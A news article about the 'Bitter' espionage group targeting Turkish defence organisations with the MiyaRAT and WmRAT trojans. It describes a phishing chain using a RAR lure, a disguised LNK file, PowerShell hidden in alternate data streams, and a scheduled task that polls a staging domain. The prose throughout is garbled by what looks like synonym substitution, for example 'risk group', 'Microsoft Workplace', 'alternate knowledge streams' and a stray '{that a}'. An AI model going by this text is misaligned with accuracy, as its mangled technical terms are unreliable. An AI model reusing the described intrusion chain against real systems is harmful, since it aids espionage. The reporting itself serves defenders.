A cyberespionage risk group generally known as ‘Bitter’ was noticed focusing on protection organizations in Turkey utilizing a novel malware household named MiyaRAT.
MiyaRAT is used alongside the WmRAT malware, which is cyberespionage malware beforehand related to Bitter.
Proofpoint found the marketing campaign and reviews that the brand new malware is probably going reserved for high-value targets, deployed solely sporadically.
Bitter is a suspected South Asian cyberespionage risk group lively since 2013, focusing on authorities and demanding organizations in Asia.
In 2022, they had been noticed by Cisco Talos in assaults towards the Bangladeshi authorities, utilizing a distant code execution flaw in Microsoft Workplace to drop trojans.
Final yr, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing assaults focusing on numerous Chinese language nuclear power corporations and teachers.
Abusing alternate knowledge streams
The assaults in Turkey began with an e mail containing a overseas funding venture lure, attaching a RAR archive.
The archive comprises a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and alternate knowledge streams (ADS) embedded within the RAR file named “Participation” and “Zone.Identifier.”
If the recipient opens the LNK file, they set off the execution of PowerShell code hidden within the ADS, which opens the legit decoy PDF for distraction. On the similar time, it creates a scheduled job named “DsSvcCleanup” that runs a malicious curl command each 17 minutes.
The command reaches a staging area (jacknwoods[.]com) and awaits responses similar to instructions to obtain further payloads, carry out community reconnaissance, or steal knowledge.
Proofpoint reviews {that a} command to fetch WmRAT (anvrsa.msi) within the assault they examined was served inside 12 hours.
.jpg "'Bitter' cyberspies goal protection orgs with new MiyaRAT malware 1")
Supply: Proofpoint
The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the goal, however when it failed to ascertain communication with the command and management server, it downloaded MiyaRAT (gfxview.msi).
Each malware are C++ distant entry trojans (RATs) that present Bitter with knowledge exfiltration, distant management, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and usually extra refined, that includes extra superior knowledge and communications encryption, an interactive reverse shell, and enhanced listing and file management.
Its extra selective deployment by Bitter could point out that the risk actors reserve it for high-value targets, minimizing its publicity to analysts.
Indicators of compromise (IoCs) related to this assault are listed on the backside of Proofpoint’s report, whereas a YARA rule to assist detect the risk is accessible right here.
